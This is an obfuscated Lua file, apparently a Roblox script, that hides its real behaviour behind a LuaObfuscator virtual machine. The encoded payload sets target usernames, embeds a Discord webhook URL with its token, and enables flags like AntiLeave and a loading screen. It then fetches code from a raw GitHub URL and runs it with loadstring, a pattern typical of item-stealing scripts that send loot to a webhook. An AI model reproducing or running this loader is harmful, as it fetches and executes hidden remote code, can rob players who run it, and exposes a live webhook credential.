--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25()local v31=0;local v32;local v33;local v34;local v35;local v36;local v37;while true do if (v31==0) then v32=v24();v33=v24();v31=2 -1 ;end if (v31==((188 -(67 + 113)) -5)) then if (v36==(0 -(0 + 0))) then if (v35==(0 -(0 -0))) then return v37 * (619 -(555 + 64)) ;else v36=932 -(857 + 74) ;v34=568 -(270 + 97 + 201) ;end elseif (v36==(2974 -(214 + 713))) then return ((v35==(0 + 0)) and (v37 * (1/(0 + 0)))) or (v37 * NaN) ;end return v8(v37,v36-(1900 -(282 + 595)) ) * (v34 + (v35/(((6514 -4875) -(1523 + 114))^(47 + 5)))) ;end if (v31==(2 -0)) then v36=v21(v33,21,31);v37=((v21(v33,1097 -(68 + 997) )==(1271 -((1178 -(802 + 150)) + 1044))) and  -(4 -3)) or (118 -(32 + 85)) ;v31=3 + 0 ;end if (v31==(1 + 0)) then v34=958 -(892 + 65) ;v35=(v21(v33,2 -1 ,20) * ((3 -1)^(58 -26))) + v32 ;v31=(947 -595) -(87 + (476 -213)) ;end end end v26=nil;function v26(v38)local v39;if  not v38 then v38=v24();if (v38==(0 + 0)) then return "";end end v39=v3(v16,v19,(v19 + v38) -(2 -1) );v19=v19 + v38 ;local v40={};for v68=998 -(915 + 82) , #v39 do v40[v68]=v2(v1(v3(v39,v68,v68)));end return v6(v40);end v18=5;end if (7==v18) then function v30(v41,v42,v43)local v44=v41[1];local v45=v41[2];local v46=v41[3];return function(...)local v70=v44;local v71=v45;local v72=v46;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v84=0,v78 do if (v84>=v72) then v76[v84-v72 ]=v77[v84 + 1 ];else v80[v84]=v77[v84 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v85=0;while true do if (v85==1) then if (v83<=5) then if (v83<=2) then if (v83<=0) then do return;end elseif (v83==1) then v80[v82[2]]=v82[3];else local v124=0;local v125;local v126;local v127;local v128;local v129;while true do if (v124==1) then v82=v70[v74];v80[v82[2]]=v43[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v43[v82[3]];v74=v74 + 1 ;v124=2;end if (v124==2) then v82=v70[v74];v129=v82[2];v128=v80[v82[3]];v80[v129 + 1 ]=v128;v80[v129]=v128[v82[4]];v74=v74 + 1 ;v124=3;end if (3==v124) then v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v124=4;end if (v124==5) then v74=v74 + 1 ;v82=v70[v74];v129=v82[2];v80[v129]=v80[v129](v13(v80,v129 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v124=6;end if (4==v124) then v82=v70[v74];v129=v82[2];v126,v127=v73(v80[v129](v13(v80,v129 + 1 ,v82[3])));v75=(v127 + v129) -1 ;v125=0;for v172=v129,v75 do v125=v125 + 1 ;v80[v172]=v126[v125];end v124=5;end if (v124==0) then v125=nil;v126,v127=nil;v128=nil;v129=nil;v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v124=1;end if (v124==6) then v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end break;end end end elseif (v83<=3) then local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==0) then v110=v82[2];v111,v112=v73(v80[v110](v13(v80,v110 + 1 ,v82[3])));v109=1;end if (v109==1) then v75=(v112 + v110) -1 ;v113=0;v109=2;end if (v109==2) then for v142=v110,v75 do local v143=0;while true do if (v143==0) then v113=v113 + 1 ;v80[v142]=v111[v113];break;end end end break;end end elseif (v83==4) then v80[v82[2]]();else v43[v82[3]]=v80[v82[2]];end elseif (v83<=8) then if (v83<=6) then local v114=v82[2];v80[v114]=v80[v114](v13(v80,v114 + 1 ,v75));elseif (v83==7) then local v132=0;local v133;local v134;while true do if (v132==1) then v80[v133 + 1 ]=v134;v80[v133]=v134[v82[4]];break;end if (v132==0) then v133=v82[2];v134=v80[v82[3]];v132=1;end end else v80[v82[2]][v82[3]]=v82[4];end elseif (v83<=9) then v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v43[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v43[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v43[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v43[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v43[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];elseif (v83==10) then v80[v82[2]]=v43[v82[3]];else v80[v82[2]]=v82[3]~=0 ;end v74=v74 + 1 ;break;end if (v85==0) then v82=v70[v74];v83=v82[1];v85=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v47)if (v1(v47,2)==79) then v20=v0(v3(v47,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v47,16));if v20 then local v101=v5(v87,v20);v20=nil;return v101;else return v87;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v48=0;local v49;local v50;local v51;local v52;while true do if (((0 + 0) -0)==v48) then v49,v50,v51,v52=v1(v16,v19,v19 + 3 );v19=v19 + (1191 -(1069 + 118)) ;v48=2 -1 ;end if ((1 -0)==v48) then return (v52 * 16777216) + (v51 * (11394 + 54142)) + (v50 * (454 -198)) + v49 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==0) then local v91=0;while true do if (0==v91) then v54=0 + 0 ;v55=nil;v91=1;end if (v91~=1) then else v53=1 + 0 ;break;end end end if (3==v53) then v60=nil;while true do local v98=241 -(187 + 54) ;while true do if (1~=v98) then else if (v54~=0) then else local v102=0;local v103;while true do if ((780 -(162 + 618))~=v102) then else v103=0 + 0 ;while true do if (v103==(0 + 0)) then local v144=0 -0 ;while true do if (v144~=(1131 -(369 + 761))) then else v103=1 + 0 ;break;end if (v144~=(0 -0)) then else v55={};v56={};v144=1 -0 ;end end end if (v103==(240 -(64 + 174))) then v54=1 -0 ;break;end if (v103==(1 -0)) then local v145=336 -(144 + 192) ;local v146;while true do if (0==v145) then v146=0;while true do if (v146==1) then v103=2;break;end if (v146==0) then local v181=0;while true do if (v181==(0 + 0)) then v57={};v58={v55,v56,nil,v57};v181=1001 -(451 + 549) ;end if (v181~=(1 + 0)) then else v146=1;break;end end end end break;end end end end break;end end end break;end if (v98~=(1580 -(1183 + 397))) then else if (v54==1) then local v104=0 -0 ;local v105;local v106;while true do if (v104~=(1 + 0)) then else while true do if ((0 -0)~=v105) then else v106=1384 -(746 + 638) ;while true do if (v106~=1) then else local v177=0 + 0 ;local v178;while true do if (v177~=(0 + 0)) then else v178=0 -0 ;while true do if (v178==(1934 -(565 + 1368))) then v106=2 -0 ;break;end if (v178~=0) then else for v190=342 -(218 + 123) ,v59 do local v191=0;local v192;local v193;local v194;local v195;while true do if ((1582 -(1535 + 46))==v191) then v194=nil;v195=nil;v191=2;end if (v191~=(0 + 0)) then else local v196=0 + 0 ;while true do if ((561 -(306 + 254))==v196) then v191=1 + 0 ;break;end if ((0 -0)~=v196) then else v192=0 -0 ;v193=nil;v196=1468 -(899 + 568) ;end end end if ((2 + 0)==v191) then while true do if (v192==(856 -(564 + 292))) then local v197=0 -0 ;while true do if (v197==(603 -(268 + 335))) then v193=290 -(60 + 230) ;v194=nil;v197=1;end if (v197~=(2 -1)) then else v192=573 -(426 + 146) ;break;end end end if (v192==1) then v195=nil;while true do if (v193==(1 + 0)) then if (v194==1) then v195=v22()~=(1456 -(282 + 1174)) ;elseif (v194==2) then v195=v25();elseif (v194~=(814 -(569 + 242))) then else v195=v26();end v60[v190]=v195;break;end if (v193~=(0 -0)) then else local v205=1001 -(938 + 63) ;local v206;local v207;while true do if (v205==(0 + 0)) then v206=0;v207=nil;v205=1 + 0 ;end if (v205==1) then while true do if ((1024 -(706 + 318))==v206) then v207=1251 -(721 + 530) ;while true do if (v207==(0 + 0)) then local v215=0;while true do if (v215~=(1271 -(945 + 326))) then else v194=v22();v195=nil;v215=2 -1 ;end if (v215~=(1 + 0)) then else v207=701 -(271 + 429) ;break;end end end if (v207==(1 -0)) then v193=1 + 0 ;break;end end break;end end break;end end end end break;end end break;end end end v58[1878 -(157 + 1718) ]=v22();v178=1501 -(1408 + 92) ;end end break;end end end if (v106==(1088 -(461 + 625))) then v54=1290 -(993 + 295) ;break;end if (v106==0) then local v179=0 -0 ;while true do if ((1 + 0)~=v179) then else v106=1;break;end if (v179~=(1171 -(418 + 753))) then else v59=v24();v60={};v179=1;end end end end break;end end break;end if (v104~=(0 + 0)) then else v105=0;v106=nil;v104=1 + 0 ;end end end if (v54==(1020 -(697 + 321))) then local v107=0 + 0 ;local v108;while true do if (v107~=0) then else v108=0 + 0 ;while true do local v140=0;while true do if (v140==0) then if (v108==(530 -(406 + 123))) then return v58;end if (v108==(1769 -(1749 + 20))) then local v180=0 + 0 ;while true do if (v180==(1323 -(1249 + 73))) then v108=1 -0 ;break;end if (v180~=(0 -0)) then else for v182=1 + 0 ,v24() do local v183=1145 -(466 + 679) ;local v184;local v185;local v186;while true do if ((1228 -(322 + 905))==v183) then v186=nil;while true do if (v184==(0 -0)) then v185=0 -0 ;v186=nil;v184=1190 -(449 + 740) ;end if (v184==(1901 -(106 + 1794))) then while true do if ((947 -(245 + 702))~=v185) then else v186=v22();if (v21(v186,1,3 -2 )==0) then local v198=0;local v199;local v200;local v201;local v202;local v203;while true do if (v198==(1 + 1)) then v203=nil;while true do if (v199==(1900 -(260 + 1638))) then while true do if (v200~=2) then else local v210=0 + 0 ;local v211;while true do if ((0 -0)==v210) then v211=0 -0 ;while true do if (v211==(2 -1)) then v200=117 -(4 + 110) ;break;end if (v211==(584 -(57 + 527))) then local v221=1427 -(41 + 1386) ;while true do if (v221==(0 -0)) then if (v21(v202,2 -1 ,1 + 0 )==(104 -(17 + 86))) then v203[2 + 0 ]=v60[v203[216 -(22 + 192) ]];end if (v21(v202,3 -1 ,5 -3 )~=(1464 -(1404 + 59))) then else v203[169 -(122 + 44) ]=v60[v203[3]];end v221=1;end if (v221==(1 -0)) then v211=3 -2 ;break;end end end end break;end end end if (v200==(0 + 0)) then local v212=0 + 0 ;while true do if (v212==(0 -0)) then local v218=765 -(468 + 297) ;while true do if (0~=v218) then else v201=v21(v186,564 -(334 + 228) ,3);v202=v21(v186,69 -(30 + 35) ,13 -7 );v218=1 + 0 ;end if (v218~=(1 -0)) then else v212=1;break;end end end if (v212==(1258 -(1043 + 214))) then v200=1;break;end end end if ((239 -(141 + 95))==v200) then if (v21(v202,3 + 0 ,11 -8 )==(1213 -(323 + 889))) then v203[10 -6 ]=v60[v203[4]];end v55[v182]=v203;break;end if (v200~=1) then else local v214=0 -0 ;while true do if (v214==(580 -(361 + 219))) then local v219=320 -(53 + 267) ;local v220;while true do if (v219==(0 + 0)) then v220=413 -(15 + 398) ;while true do if (v220==0) then v203={v23(),v23(),nil,nil};if (v201==(0 + 0)) then local v226=0 + 0 ;local v227;local v228;while true do if (v226==(851 -(20 + 830))) then while true do if (v227==(0 + 0)) then v228=0;while true do if (v228==(0 + 0)) then v203[768 -(574 + 191) ]=v23();v203[4]=v23();break;end end break;end end break;end if ((126 -(116 + 10))==v226) then v227=0 -0 ;v228=nil;v226=1 + 0 ;end end elseif (v201==1) then v203[1 + 2 ]=v24();elseif (v201==(851 -(254 + 595))) then v203[741 -(542 + 196) ]=v24() -(2^(20 -4)) ;elseif (v201~=(1793 -(573 + 1217))) then else local v231=0;local v232;local v233;while true do if (v231==0) then v232=0 -0 ;v233=nil;v231=1 + 0 ;end if (v231==(1 + 0)) then while true do if (v232==(0 + 0)) then v233=0 + 0 ;while true do if ((939 -(714 + 225))==v233) then v203[7 -4 ]=v24() -((4 -2)^(46 -30)) ;v203[1555 -(1126 + 425) ]=v23();break;end end break;end end break;end end end v220=1 + 0 ;end if (v220~=(406 -(118 + 287))) then else v214=3 -2 ;break;end end break;end end end if (v214==(1122 -(118 + 1003))) then v200=5 -3 ;break;end end end end break;end if (v199==1) then v202=nil;v203=nil;v199=379 -(142 + 235) ;end if ((0 -0)~=v199) then else local v208=0;local v209;while true do if (v208~=(0 + 0)) then else v209=977 -(553 + 424) ;while true do if (v209==(1886 -(927 + 959))) then v200=0 -0 ;v201=nil;v209=1 + 0 ;end if ((1 + 0)==v209) then v199=1 + 0 ;break;end end break;end end end end break;end if ((1 + 0)~=v198) then else v201=nil;v202=nil;v198=2 + 0 ;end if ((0 -0)~=v198) then else v199=0 -0 ;v200=nil;v198=2 -1 ;end end end break;end end break;end end break;end if (v183~=(0 + 0)) then else v184=0;v185=nil;v183=4 -3 ;end end end for v187=286 -(175 + 110) ,v24() do v56[v187-(754 -(239 + 514)) ]=v29();end v180=1 + 0 ;end end end break;end end end break;end end end v98=1;end end end break;end if (v53==(1798 -(503 + 1293))) then local v92=1329 -(797 + 532) ;while true do if (0~=v92) then else v58=nil;v59=nil;v92=1;end if (v92==1) then v53=8 -5 ;break;end end end if (v53~=1) then else local v93=0 + 0 ;while true do if (v93==(1061 -(810 + 251))) then v56=nil;v57=nil;v93=1;end if ((1 + 0)==v93) then v53=1 + 1 ;break;end end end end end v30=nil;v18=7;end if (v18==1) then v21=nil;function v21(v61,v62,v63)if v63 then local v88=0 + 0 ;local v89;while true do if (v88==(533 -(43 + 490))) then v89=(v61/(2^(v62-(734 -(711 + 18 + 4)))))%(2^(((v63-(3 -2)) -(v62-(860 -(240 + 619)))) + 1)) ;return v89-(v89%(1 + 0)) ;end end else local v90=((2 + 0) -0)^(v62-(1 + 0)) ;return (((v61%(v90 + v90))>=v90) and (1745 -(1344 + 400))) or (405 -(255 + 150)) ;end end v22=nil;v18=2;end if (v18==2) then function v22()local v64=v1(v16,v19,v19);v19=v19 + 1 ;return v64;end v23=nil;function v23()local v65=0 -0 ;local v66;local v67;while true do if ((0 -0)==v65) then v66,v67=v1(v16,v19,v19 + (1741 -(404 + 1335)) );v19=v19 + (408 -(183 + 223)) ;v65=1 -0 ;end if ((1 + (337 -(10 + 327)))==v65) then return (v67 * (93 + 163)) + v66 ;end end end v18=3;end if (5==v18) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end end end v15("LOL!0F3O0003083O00557365724E616D65030B3O00446F6E7661736B613O3103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313237362O353135392O3635372O393139382F326F617743444A61396230376274545535317268594D376C4436416865734E545077785A5F546572774A2D46527479355362434154487230486236634A35454D756C666A03093O00557365724E616D6532030C3O0050726F5F47616D65722O315303023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012093O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A000900120A3O00073O0030023O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
